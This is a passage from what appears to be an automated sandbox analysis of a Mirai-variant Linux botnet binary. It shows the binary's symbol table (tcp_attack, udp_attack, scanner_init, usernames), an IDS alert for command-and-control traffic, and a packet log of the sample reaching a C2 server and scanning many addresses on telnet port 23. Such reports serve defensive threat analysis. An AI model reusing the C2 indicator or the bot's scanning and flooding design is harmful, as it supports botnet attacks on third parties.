              randtbl.symtab0x8057cac128OBJECT<unknown>DEFAULT11
              rawmemchr.symtab0x805231019FUNC<unknown>DEFAULT2
              rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              read.symtab0x804f4f091FUNC<unknown>DEFAULT2
              read_until_response.symtab0x8049c00337FUNC<unknown>DEFAULT2
              readdir.symtab0x804c468127FUNC<unknown>DEFAULT2
              readdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              readdir64.symtab0x804fe4c129FUNC<unknown>DEFAULT2
              readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              readlink.symtab0x804c18447FUNC<unknown>DEFAULT2
              readlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              realloc.symtab0x8051918763FUNC<unknown>DEFAULT2
              realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              recv.symtab0x804d99892FUNC<unknown>DEFAULT2
              recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              register-atfork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              remoteaddr.symtab0x805aba032OBJECT<unknown>DEFAULT12
              rindex.symtab0x80516e426FUNC<unknown>DEFAULT2
              safe_paths.symtab0x8057660248OBJECT<unknown>DEFAULT11
              sbrk.symtab0x804fc6864FUNC<unknown>DEFAULT2
              sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              scan_pid.symtab0x805b2584OBJECT<unknown>DEFAULT12
              scanner_init.symtab0x8049d608828FUNC<unknown>DEFAULT2
              select.symtab0x804c1ed108FUNC<unknown>DEFAULT2
              select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              self_realpath.symtab0x8057d80260OBJECT<unknown>DEFAULT12
              send.symtab0x804d9f492FUNC<unknown>DEFAULT2
              send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              setstate.symtab0x804e82a87FUNC<unknown>DEFAULT2
              setstate_r.symtab0x804eaae161FUNC<unknown>DEFAULT2
              sigaction.symtab0x804f90f80FUNC<unknown>DEFAULT2
              sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sigprocmask.symtab0x804fca897FUNC<unknown>DEFAULT2
              sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sleep.symtab0x804f314195FUNC<unknown>DEFAULT2
              sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sockFD.symtab0x80578944OBJECT<unknown>DEFAULT11
              socket.symtab0x804da5040FUNC<unknown>DEFAULT2
              socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sockprintf.symtab0x8049b80121FUNC<unknown>DEFAULT2
              spec_and_mask.6462.symtab0x805578016OBJECT<unknown>DEFAULT4
              spec_base.6453.symtab0x80557647OBJECT<unknown>DEFAULT4
              spec_chars.6459.symtab0x80557d021OBJECT<unknown>DEFAULT4
              spec_flags.6458.symtab0x80557e88OBJECT<unknown>DEFAULT4
              spec_or_mask.6461.symtab0x805579016OBJECT<unknown>DEFAULT4
              spec_ranges.6460.symtab0x80557a09OBJECT<unknown>DEFAULT4
              sprintf.symtab0x804c5d830FUNC<unknown>DEFAULT2
              sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              srand.symtab0x804e8d661FUNC<unknown>DEFAULT2
              srandom.symtab0x804e8d661FUNC<unknown>DEFAULT2
              srandom_r.symtab0x804e973160FUNC<unknown>DEFAULT2
              static_dtv.symtab0x805a43c512OBJECT<unknown>DEFAULT12
              static_map.symtab0x805a94452OBJECT<unknown>DEFAULT12
              static_slotinfo.symtab0x805a63c776OBJECT<unknown>DEFAULT12
              stderr.symtab0x8057b6c4OBJECT<unknown>DEFAULT11
              stdin.symtab0x8057b644OBJECT<unknown>DEFAULT11
              stdout.symtab0x8057b684OBJECT<unknown>DEFAULT11
              strcasestr.symtab0x804d7a483FUNC<unknown>DEFAULT2
              strcasestr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strcat.symtab0x804d61435FUNC<unknown>DEFAULT2
              strcat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strchr.symtab0x80516a830FUNC<unknown>DEFAULT2
              strchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strchrnul.symtab0x80516c825FUNC<unknown>DEFAULT2
              strchrnul.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strcmp.symtab0x804d63829FUNC<unknown>DEFAULT2
              strcmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strcoll.symtab0x804d63829FUNC<unknown>DEFAULT2
              strcpy.symtab0x804d65827FUNC<unknown>DEFAULT2
              strcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strcspn.symtab0x80517b445FUNC<unknown>DEFAULT2
              strcspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strerror_r.symtab0x804d6e4191FUNC<unknown>DEFAULT2
              strlen.symtab0x804d67419FUNC<unknown>DEFAULT2
              strlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strncmp.symtab0x804d68837FUNC<unknown>DEFAULT2
              strncmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strnlen.symtab0x804d6b024FUNC<unknown>DEFAULT2
              strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strpbrk.symtab0x805186035FUNC<unknown>DEFAULT2
              strpbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strrchr.symtab0x80516e426FUNC<unknown>DEFAULT2
              strrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strspn.symtab0x80517e442FUNC<unknown>DEFAULT2
              strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strtok.symtab0x804d7f822FUNC<unknown>DEFAULT2
              strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strtok_r.symtab0x805181080FUNC<unknown>DEFAULT2
              strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strtol.symtab0x804eb6423FUNC<unknown>DEFAULT2
              strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              success_prompts.symtab0x8057a7424OBJECT<unknown>DEFAULT11
              sysconf.symtab0x804edb8523FUNC<unknown>DEFAULT2
              sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              sysv_signal.symtab0x804da78103FUNC<unknown>DEFAULT2
              sysv_signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              tcgetattr.symtab0x804d82c96FUNC<unknown>DEFAULT2
              tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              tcp.symtab0x805ac0816OBJECT<unknown>DEFAULT12
              tcp_arg.symtab0x80578894OBJECT<unknown>DEFAULT11
              tcp_attack.symtab0x8048fd0326FUNC<unknown>DEFAULT2
              tel.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              thanosprint.symtab0x8049680136FUNC<unknown>DEFAULT2
              time.symtab0x804c25c16FUNC<unknown>DEFAULT2
              time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              times.symtab0x804fd0c16FUNC<unknown>DEFAULT2
              times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              tmp_dirs.symtab0x8057a8c28OBJECT<unknown>DEFAULT11
              type_arm.symtab0x8057abc12OBJECT<unknown>DEFAULT11
              type_codes.symtab0x80557ac24OBJECT<unknown>DEFAULT4
              type_sizes.symtab0x80557c412OBJECT<unknown>DEFAULT4
              udp.symtab0x805abd016OBJECT<unknown>DEFAULT12
              udp_arg.symtab0x80578854OBJECT<unknown>DEFAULT11
              udp_attack.symtab0x8048ed0244FUNC<unknown>DEFAULT2
              unknown.1474.symtab0x80557f014OBJECT<unknown>DEFAULT4
              unsafe_state.symtab0x8057c9820OBJECT<unknown>DEFAULT11
              usernames.symtab0x80578a0144OBJECT<unknown>DEFAULT11
              usleep.symtab0x804efc447FUNC<unknown>DEFAULT2
              usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              vfprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              vsnprintf.symtab0x804c5f8172FUNC<unknown>DEFAULT2
              vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              vsprintf.symtab0x804c5c023FUNC<unknown>DEFAULT2
              vsprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              w.symtab0x8057e944OBJECT<unknown>DEFAULT12
              wcrtomb.symtab0x805019463FUNC<unknown>DEFAULT2
              wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              wcsnrtombs.symtab0x80501f0128FUNC<unknown>DEFAULT2
              wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              wcsrtombs.symtab0x80501d427FUNC<unknown>DEFAULT2
              wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              whitlistpaths.symtab0x8057780244OBJECT<unknown>DEFAULT11
              write.symtab0x804f49091FUNC<unknown>DEFAULT2
              x.symtab0x8057e884OBJECT<unknown>DEFAULT12
              xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              y.symtab0x8057e8c4OBJECT<unknown>DEFAULT12
              z.symtab0x8057e904OBJECT<unknown>DEFAULT12

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              03/27/24-11:01:49.955013TCP2848902ETPRO TROJAN ELF/Mirai Variant CnC Command Inbound66747866139.59.88.74192.168.2.14

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 27, 2024 11:01:48.868307114 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:01:49.231039047 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:01:49.231090069 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:01:49.240703106 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:01:49.350372076 CET5482623192.168.2.14180.249.14.121
              Mar 27, 2024 11:01:49.350378036 CET6056623192.168.2.14147.67.11.121
              Mar 27, 2024 11:01:49.350414991 CET4975623192.168.2.14178.76.11.121
              Mar 27, 2024 11:01:49.350414991 CET3969023192.168.2.14149.246.14.121
              Mar 27, 2024 11:01:49.350431919 CET5168023192.168.2.1489.99.195.119
              Mar 27, 2024 11:01:49.350459099 CET4239623192.168.2.1425.25.186.119
              Mar 27, 2024 11:01:49.350478888 CET3984623192.168.2.1437.243.14.121
              Mar 27, 2024 11:01:49.350503922 CET6009023192.168.2.14246.142.187.21
              Mar 27, 2024 11:01:49.350536108 CET3652623192.168.2.1465.157.170.252
              Mar 27, 2024 11:01:49.350550890 CET4230423192.168.2.14141.102.230.85
              Mar 27, 2024 11:01:49.350577116 CET5397223192.168.2.14177.88.11.52
              Mar 27, 2024 11:01:49.350588083 CET5726423192.168.2.14249.158.227.156
              Mar 27, 2024 11:01:49.350614071 CET5722023192.168.2.14181.38.106.240
              Mar 27, 2024 11:01:49.350642920 CET3393623192.168.2.1423.122.254.112
              Mar 27, 2024 11:01:49.350642920 CET5029623192.168.2.14105.106.94.30
              Mar 27, 2024 11:01:49.350657940 CET3357823192.168.2.14207.112.166.127
              Mar 27, 2024 11:01:49.350735903 CET5538423192.168.2.1481.82.128.16
              Mar 27, 2024 11:01:49.350738049 CET3886223192.168.2.1446.67.121.252
              Mar 27, 2024 11:01:49.350738049 CET5505223192.168.2.1415.218.74.231
              Mar 27, 2024 11:01:49.350742102 CET4257623192.168.2.14143.143.97.11
              Mar 27, 2024 11:01:49.350768089 CET4339223192.168.2.14254.221.55.61
              Mar 27, 2024 11:01:49.350775003 CET3856423192.168.2.14245.226.28.140
              Mar 27, 2024 11:01:49.350792885 CET4536023192.168.2.14253.59.28.158
              Mar 27, 2024 11:01:49.350805998 CET4416223192.168.2.1470.194.6.153
              Mar 27, 2024 11:01:49.350814104 CET5924423192.168.2.14181.36.93.26
              Mar 27, 2024 11:01:49.350846052 CET4916423192.168.2.1465.102.61.113
              Mar 27, 2024 11:01:49.350867987 CET5119423192.168.2.1472.120.129.14
              Mar 27, 2024 11:01:49.350873947 CET3891223192.168.2.1444.159.58.161
              Mar 27, 2024 11:01:49.350891113 CET5267623192.168.2.1450.127.177.82
              Mar 27, 2024 11:01:49.350914955 CET4849023192.168.2.1475.20.36.200
              Mar 27, 2024 11:01:49.350933075 CET3528023192.168.2.1463.118.98.205
              Mar 27, 2024 11:01:49.350964069 CET3759823192.168.2.1464.83.212.184
              Mar 27, 2024 11:01:49.350964069 CET6074823192.168.2.14135.227.69.97
              Mar 27, 2024 11:01:49.350982904 CET4883023192.168.2.14168.37.43.137
              Mar 27, 2024 11:01:49.351020098 CET3660023192.168.2.1460.105.38.87
              Mar 27, 2024 11:01:49.351032972 CET5690223192.168.2.14203.126.114.77
              Mar 27, 2024 11:01:49.351066113 CET3774623192.168.2.14152.150.179.211
              Mar 27, 2024 11:01:49.351075888 CET3548023192.168.2.1491.106.184.183
              Mar 27, 2024 11:01:49.351078987 CET3755423192.168.2.1457.245.101.3
              Mar 27, 2024 11:01:49.351099014 CET5052223192.168.2.1465.222.226.105
              Mar 27, 2024 11:01:49.351128101 CET6094623192.168.2.1423.123.74.10
              Mar 27, 2024 11:01:49.351131916 CET5838823192.168.2.14121.34.2.69
              Mar 27, 2024 11:01:49.351146936 CET4642623192.168.2.14183.34.212.126
              Mar 27, 2024 11:01:49.351182938 CET5200023192.168.2.14250.235.187.1
              Mar 27, 2024 11:01:49.351182938 CET4353223192.168.2.1494.16.254.85
              Mar 27, 2024 11:01:49.351211071 CET4582223192.168.2.1453.75.53.12
              Mar 27, 2024 11:01:49.351243973 CET5525223192.168.2.14158.17.43.211
              Mar 27, 2024 11:01:49.351258993 CET5907823192.168.2.1458.212.17.13
              Mar 27, 2024 11:01:49.351263046 CET4986423192.168.2.1438.73.200.168
              Mar 27, 2024 11:01:49.351284027 CET3718023192.168.2.1486.148.46.133
              Mar 27, 2024 11:01:49.351314068 CET5016623192.168.2.14205.48.29.6
              Mar 27, 2024 11:01:49.351316929 CET3947023192.168.2.1481.200.118.236
              Mar 27, 2024 11:01:49.351337910 CET3486623192.168.2.14173.211.243.244
              Mar 27, 2024 11:01:49.351352930 CET5626023192.168.2.1465.101.142.5
              Mar 27, 2024 11:01:49.351414919 CET3970823192.168.2.1447.12.144.218
              Mar 27, 2024 11:01:49.351418018 CET6069823192.168.2.14101.166.250.234
              Mar 27, 2024 11:01:49.351418018 CET5754423192.168.2.1443.207.148.176
              Mar 27, 2024 11:01:49.351423979 CET5500023192.168.2.1481.222.66.172
              Mar 27, 2024 11:01:49.351463079 CET3588023192.168.2.14248.228.79.133
              Mar 27, 2024 11:01:49.351463079 CET4172023192.168.2.1450.140.180.147
              Mar 27, 2024 11:01:49.351486921 CET5724223192.168.2.1410.113.228.223
              Mar 27, 2024 11:01:49.351495028 CET5490023192.168.2.14241.140.238.101
              Mar 27, 2024 11:01:49.351541042 CET5728823192.168.2.1498.73.12.82
              Mar 27, 2024 11:01:49.351540089 CET5891623192.168.2.14255.15.158.168
              Mar 27, 2024 11:01:49.351561069 CET6083823192.168.2.14199.87.14.84
              Mar 27, 2024 11:01:49.351578951 CET3354623192.168.2.14179.208.150.69
              Mar 27, 2024 11:01:49.351603031 CET3351823192.168.2.1458.198.225.117
              Mar 27, 2024 11:01:49.351608992 CET3756223192.168.2.14142.222.88.45
              Mar 27, 2024 11:01:49.351625919 CET4727223192.168.2.14141.4.206.11
              Mar 27, 2024 11:01:49.351641893 CET6087423192.168.2.1415.94.46.248
              Mar 27, 2024 11:01:49.351665974 CET4836023192.168.2.14118.149.194.104
              Mar 27, 2024 11:01:49.351667881 CET4865823192.168.2.1438.135.133.131
              Mar 27, 2024 11:01:49.351681948 CET3709623192.168.2.14143.30.83.19
              Mar 27, 2024 11:01:49.351696014 CET4424423192.168.2.14204.228.7.153
              Mar 27, 2024 11:01:49.351720095 CET4855823192.168.2.14125.252.20.54
              Mar 27, 2024 11:01:49.351749897 CET5077023192.168.2.1469.126.45.193
              Mar 27, 2024 11:01:49.351764917 CET4522623192.168.2.1440.195.170.103
              Mar 27, 2024 11:01:49.351779938 CET3485623192.168.2.14180.44.204.246
              Mar 27, 2024 11:01:49.351803064 CET6042623192.168.2.1487.82.61.177
              Mar 27, 2024 11:01:49.351820946 CET4149623192.168.2.1499.205.72.27
              Mar 27, 2024 11:01:49.351838112 CET3423223192.168.2.14161.254.202.42
              Mar 27, 2024 11:01:49.351855993 CET5978423192.168.2.14192.222.244.189
              Mar 27, 2024 11:01:49.351876020 CET5456423192.168.2.14195.140.0.230
              Mar 27, 2024 11:01:49.351896048 CET3286223192.168.2.14181.102.126.187
              Mar 27, 2024 11:01:49.351914883 CET3408423192.168.2.14141.184.60.198
              Mar 27, 2024 11:01:49.351928949 CET5159023192.168.2.1484.124.37.221
              Mar 27, 2024 11:01:49.351934910 CET4875223192.168.2.14167.149.161.63
              Mar 27, 2024 11:01:49.351963997 CET4804023192.168.2.1440.23.162.119
              Mar 27, 2024 11:01:49.351977110 CET5080623192.168.2.14129.49.121.84
              Mar 27, 2024 11:01:49.351998091 CET6016223192.168.2.14134.32.72.162
              Mar 27, 2024 11:01:49.352015018 CET5178023192.168.2.14197.149.119.145
              Mar 27, 2024 11:01:49.352044106 CET4973623192.168.2.14148.203.11.246
              Mar 27, 2024 11:01:49.352077961 CET4677223192.168.2.14118.61.56.165
              Mar 27, 2024 11:01:49.352081060 CET3708223192.168.2.1423.72.204.136
              Mar 27, 2024 11:01:49.352094889 CET4387423192.168.2.1446.21.199.13
              Mar 27, 2024 11:01:49.352112055 CET5276023192.168.2.1410.201.24.126
              Mar 27, 2024 11:01:49.352135897 CET4943023192.168.2.1446.186.126.148
              Mar 27, 2024 11:01:49.352150917 CET4746023192.168.2.1490.246.201.240
              Mar 27, 2024 11:01:49.352168083 CET4443623192.168.2.148.227.146.197
              Mar 27, 2024 11:01:49.352178097 CET3951623192.168.2.1441.50.122.125
              Mar 27, 2024 11:01:49.352210045 CET4938023192.168.2.1498.88.180.28
              Mar 27, 2024 11:01:49.352222919 CET4383023192.168.2.14136.6.112.163
              Mar 27, 2024 11:01:49.352248907 CET5792823192.168.2.1477.59.168.241
              Mar 27, 2024 11:01:49.352262020 CET5176623192.168.2.1443.180.239.93
              Mar 27, 2024 11:01:49.352288008 CET5418023192.168.2.14205.205.100.75
              Mar 27, 2024 11:01:49.352289915 CET3740023192.168.2.14188.128.38.227
              Mar 27, 2024 11:01:49.352313042 CET5138223192.168.2.14180.220.57.30
              Mar 27, 2024 11:01:49.352328062 CET5899023192.168.2.14151.36.125.83
              Mar 27, 2024 11:01:49.352345943 CET4930423192.168.2.14144.129.26.62
              Mar 27, 2024 11:01:49.352368116 CET4134223192.168.2.14189.28.216.142
              Mar 27, 2024 11:01:49.352386951 CET5240623192.168.2.14174.173.212.94
              Mar 27, 2024 11:01:49.352397919 CET5888023192.168.2.14104.104.203.14
              Mar 27, 2024 11:01:49.352428913 CET6049223192.168.2.14248.160.184.64
              Mar 27, 2024 11:01:49.352436066 CET4223223192.168.2.14156.204.250.187
              Mar 27, 2024 11:01:49.352467060 CET5915823192.168.2.14100.25.110.52
              Mar 27, 2024 11:01:49.352472067 CET4279823192.168.2.1489.173.157.89
              Mar 27, 2024 11:01:49.352493048 CET5330823192.168.2.1457.27.219.246
              Mar 27, 2024 11:01:49.352504969 CET4242623192.168.2.1484.183.30.225
              Mar 27, 2024 11:01:49.352526903 CET4940023192.168.2.1442.55.255.165
              Mar 27, 2024 11:01:49.352551937 CET4920623192.168.2.14169.177.188.17
              Mar 27, 2024 11:01:49.352564096 CET3560623192.168.2.14116.98.144.63
              Mar 27, 2024 11:01:49.352582932 CET5920823192.168.2.14197.214.32.43
              Mar 27, 2024 11:01:49.352628946 CET4157223192.168.2.1491.52.255.131
              Mar 27, 2024 11:01:49.352629900 CET3881823192.168.2.14146.101.192.63
              Mar 27, 2024 11:01:49.352653027 CET3497223192.168.2.1481.10.123.18
              Mar 27, 2024 11:01:49.352670908 CET4906023192.168.2.1496.55.118.178
              Mar 27, 2024 11:01:49.352686882 CET3849623192.168.2.14153.144.81.200
              Mar 27, 2024 11:01:49.352729082 CET4265423192.168.2.14244.144.129.244
              Mar 27, 2024 11:01:49.352735996 CET5473023192.168.2.14183.37.98.62
              Mar 27, 2024 11:01:49.352750063 CET5240623192.168.2.1444.216.172.61
              Mar 27, 2024 11:01:49.352762938 CET4054823192.168.2.1488.82.61.121
              Mar 27, 2024 11:01:49.352782011 CET3509223192.168.2.14187.107.195.129
              Mar 27, 2024 11:01:49.352797985 CET5369223192.168.2.14169.169.163.174
              Mar 27, 2024 11:01:49.352826118 CET4561423192.168.2.14145.74.169.102
              Mar 27, 2024 11:01:49.352847099 CET4800623192.168.2.1476.107.173.252
              Mar 27, 2024 11:01:49.352879047 CET3468623192.168.2.14145.123.240.79
              Mar 27, 2024 11:01:49.352885008 CET4547223192.168.2.14167.137.116.17
              Mar 27, 2024 11:01:49.352926016 CET4378623192.168.2.14218.180.165.61
              Mar 27, 2024 11:01:49.352926016 CET3867023192.168.2.1441.79.197.170
              Mar 27, 2024 11:01:49.352931976 CET3585223192.168.2.1419.133.37.102
              Mar 27, 2024 11:01:49.352957964 CET4511423192.168.2.14193.1.169.211
              Mar 27, 2024 11:01:49.352966070 CET5751623192.168.2.1410.124.186.195
              Mar 27, 2024 11:01:49.352988005 CET3659023192.168.2.1483.223.134.67
              Mar 27, 2024 11:01:49.353002071 CET3338423192.168.2.1445.199.193.9
              Mar 27, 2024 11:01:49.353039980 CET4950423192.168.2.14221.104.253.146
              Mar 27, 2024 11:01:49.353055954 CET5829423192.168.2.14164.12.183.130
              Mar 27, 2024 11:01:49.353063107 CET5828223192.168.2.14147.110.65.240
              Mar 27, 2024 11:01:49.353110075 CET3415223192.168.2.14126.164.107.179
              Mar 27, 2024 11:01:49.353112936 CET5009423192.168.2.14198.75.131.137
              Mar 27, 2024 11:01:49.353137970 CET4668823192.168.2.1458.241.34.78
              Mar 27, 2024 11:01:49.353157997 CET4104023192.168.2.1467.94.108.221
              Mar 27, 2024 11:01:49.353182077 CET5539423192.168.2.14196.89.202.51
              Mar 27, 2024 11:01:49.353187084 CET5187023192.168.2.14107.160.213.231
              Mar 27, 2024 11:01:49.353215933 CET3951023192.168.2.14138.54.39.190
              Mar 27, 2024 11:01:49.353215933 CET4958223192.168.2.1475.249.6.1
              Mar 27, 2024 11:01:49.353252888 CET3755023192.168.2.1473.166.255.42
              Mar 27, 2024 11:01:49.353261948 CET5483823192.168.2.14250.86.235.173
              Mar 27, 2024 11:01:49.353270054 CET5511223192.168.2.14173.46.17.155
              Mar 27, 2024 11:01:49.353312016 CET5994023192.168.2.14111.115.50.48
              Mar 27, 2024 11:01:49.353313923 CET5821623192.168.2.1445.76.40.231
              Mar 27, 2024 11:01:49.353332996 CET4660823192.168.2.1413.149.239.213
              Mar 27, 2024 11:01:49.353338957 CET5110023192.168.2.14185.226.3.112
              Mar 27, 2024 11:01:49.353368044 CET3843223192.168.2.14221.78.9.211
              Mar 27, 2024 11:01:49.353377104 CET4904623192.168.2.14174.178.226.217
              Mar 27, 2024 11:01:49.353404999 CET5050823192.168.2.1498.19.12.112
              Mar 27, 2024 11:01:49.353420973 CET3661023192.168.2.14240.33.117.31
              Mar 27, 2024 11:01:49.353435040 CET5679623192.168.2.14101.251.147.134
              Mar 27, 2024 11:01:49.353455067 CET4737023192.168.2.14219.94.40.74
              Mar 27, 2024 11:01:49.353499889 CET4545023192.168.2.14255.195.175.90
              Mar 27, 2024 11:01:49.353518963 CET5465223192.168.2.14251.19.99.236
              Mar 27, 2024 11:01:49.353539944 CET5399623192.168.2.14193.149.50.245
              Mar 27, 2024 11:01:49.353554964 CET5896223192.168.2.1458.211.228.253
              Mar 27, 2024 11:01:49.353610992 CET3426023192.168.2.1466.71.112.217
              Mar 27, 2024 11:01:49.353621960 CET5872823192.168.2.1492.107.120.45
              Mar 27, 2024 11:01:49.353647947 CET3678023192.168.2.14175.111.133.76
              Mar 27, 2024 11:01:49.353679895 CET4107823192.168.2.14247.23.50.204
              Mar 27, 2024 11:01:49.353699923 CET5649823192.168.2.14166.167.254.34
              Mar 27, 2024 11:01:49.353717089 CET6093023192.168.2.1465.76.97.69
              Mar 27, 2024 11:01:49.353751898 CET5371423192.168.2.14218.180.220.150
              Mar 27, 2024 11:01:49.353754044 CET4374623192.168.2.14195.143.13.202
              Mar 27, 2024 11:01:49.353800058 CET6079423192.168.2.1448.242.200.65
              Mar 27, 2024 11:01:49.353813887 CET3355023192.168.2.1412.189.132.14
              Mar 27, 2024 11:01:49.353837013 CET3384823192.168.2.14136.88.81.168
              Mar 27, 2024 11:01:49.353883028 CET3447823192.168.2.1460.83.88.219
              Mar 27, 2024 11:01:49.353904009 CET5814623192.168.2.14100.201.64.246
              Mar 27, 2024 11:01:49.353916883 CET3405023192.168.2.1460.90.247.212
              Mar 27, 2024 11:01:49.353936911 CET3479823192.168.2.1445.50.47.205
              Mar 27, 2024 11:01:49.353948116 CET4847423192.168.2.1486.255.214.43
              Mar 27, 2024 11:01:49.353995085 CET5823423192.168.2.14161.24.45.219
              Mar 27, 2024 11:01:49.354034901 CET4600023192.168.2.1466.159.101.181
              Mar 27, 2024 11:01:49.354055882 CET5582423192.168.2.14153.109.111.1
              Mar 27, 2024 11:01:49.354055882 CET3684823192.168.2.14173.14.223.157
              Mar 27, 2024 11:01:49.354110003 CET3393223192.168.2.14186.240.130.183
              Mar 27, 2024 11:01:49.354115009 CET3615023192.168.2.14167.229.132.46
              Mar 27, 2024 11:01:49.354144096 CET3391223192.168.2.14118.64.251.205
              Mar 27, 2024 11:01:49.354144096 CET3875223192.168.2.142.149.52.168
              Mar 27, 2024 11:01:49.354176998 CET5045623192.168.2.14126.244.148.161
              Mar 27, 2024 11:01:49.354197979 CET5912423192.168.2.14118.207.220.22
              Mar 27, 2024 11:01:49.354214907 CET5484823192.168.2.1442.212.76.26
              Mar 27, 2024 11:01:49.354234934 CET4141423192.168.2.1425.228.125.28
              Mar 27, 2024 11:01:49.354250908 CET5984423192.168.2.1467.85.184.115
              Mar 27, 2024 11:01:49.354264021 CET5695823192.168.2.14154.50.41.15
              Mar 27, 2024 11:01:49.354314089 CET4861423192.168.2.1474.66.135.252
              Mar 27, 2024 11:01:49.354326010 CET3912623192.168.2.14200.126.126.3
              Mar 27, 2024 11:01:49.354360104 CET4872023192.168.2.14169.33.221.178
              Mar 27, 2024 11:01:49.354360104 CET5533623192.168.2.14138.104.38.244
              Mar 27, 2024 11:01:49.354394913 CET3663423192.168.2.1486.241.117.50
              Mar 27, 2024 11:01:49.354423046 CET3743623192.168.2.14111.224.134.153
              Mar 27, 2024 11:01:49.354444027 CET3434023192.168.2.1462.28.65.195
              Mar 27, 2024 11:01:49.354480982 CET4003223192.168.2.14137.55.235.107
              Mar 27, 2024 11:01:49.354480982 CET4438023192.168.2.14151.146.239.134
              Mar 27, 2024 11:01:49.354495049 CET4361023192.168.2.14152.206.132.77
              Mar 27, 2024 11:01:49.354511976 CET5718623192.168.2.14222.239.225.127
              Mar 27, 2024 11:01:49.354543924 CET3611623192.168.2.14216.97.92.65
              Mar 27, 2024 11:01:49.354549885 CET4108223192.168.2.14101.151.199.42
              Mar 27, 2024 11:01:49.354573011 CET4956223192.168.2.14252.18.40.90
              Mar 27, 2024 11:01:49.354592085 CET5080623192.168.2.14112.43.159.8
              Mar 27, 2024 11:01:49.354602098 CET3555223192.168.2.14141.15.5.188
              Mar 27, 2024 11:01:49.354619980 CET3825823192.168.2.1412.46.149.87
              Mar 27, 2024 11:01:49.354665041 CET4962823192.168.2.14123.132.11.23
              Mar 27, 2024 11:01:49.354665995 CET4415823192.168.2.14212.195.167.179
              Mar 27, 2024 11:01:49.354710102 CET4412823192.168.2.1442.79.217.177
              Mar 27, 2024 11:01:49.354720116 CET5756623192.168.2.14166.131.237.60
              Mar 27, 2024 11:01:49.354722023 CET3738223192.168.2.1490.36.186.250
              Mar 27, 2024 11:01:49.354743958 CET5010023192.168.2.14183.161.8.146
              Mar 27, 2024 11:01:49.354758978 CET3607823192.168.2.1488.223.187.185
              Mar 27, 2024 11:01:49.354777098 CET5362223192.168.2.1490.119.96.194
              Mar 27, 2024 11:01:49.354794979 CET4018223192.168.2.14245.34.18.69
              Mar 27, 2024 11:01:49.354810953 CET5933023192.168.2.1416.116.52.34
              Mar 27, 2024 11:01:49.354856968 CET5004023192.168.2.14171.13.47.227
              Mar 27, 2024 11:01:49.354867935 CET4600223192.168.2.14249.133.28.112
              Mar 27, 2024 11:01:49.354873896 CET5503223192.168.2.14133.4.205.164
              Mar 27, 2024 11:01:49.354887962 CET3325823192.168.2.14248.112.216.37
              Mar 27, 2024 11:01:49.354897022 CET3354023192.168.2.14189.99.1.190
              Mar 27, 2024 11:01:49.354928017 CET4036423192.168.2.14201.10.166.42
              Mar 27, 2024 11:01:49.354935884 CET3453823192.168.2.1452.202.131.230
              Mar 27, 2024 11:01:49.354957104 CET5053223192.168.2.14172.57.58.0
              Mar 27, 2024 11:01:49.354974985 CET4411823192.168.2.14157.174.147.181
              Mar 27, 2024 11:01:49.355000019 CET5299823192.168.2.14164.10.121.175
              Mar 27, 2024 11:01:49.355010033 CET3315223192.168.2.1410.3.117.134
              Mar 27, 2024 11:01:49.355032921 CET3291423192.168.2.1431.178.186.174
              Mar 27, 2024 11:01:49.355042934 CET5355623192.168.2.1470.161.241.201
              Mar 27, 2024 11:01:49.355063915 CET4349623192.168.2.1498.220.80.3
              Mar 27, 2024 11:01:49.355074883 CET5425223192.168.2.1481.226.19.45
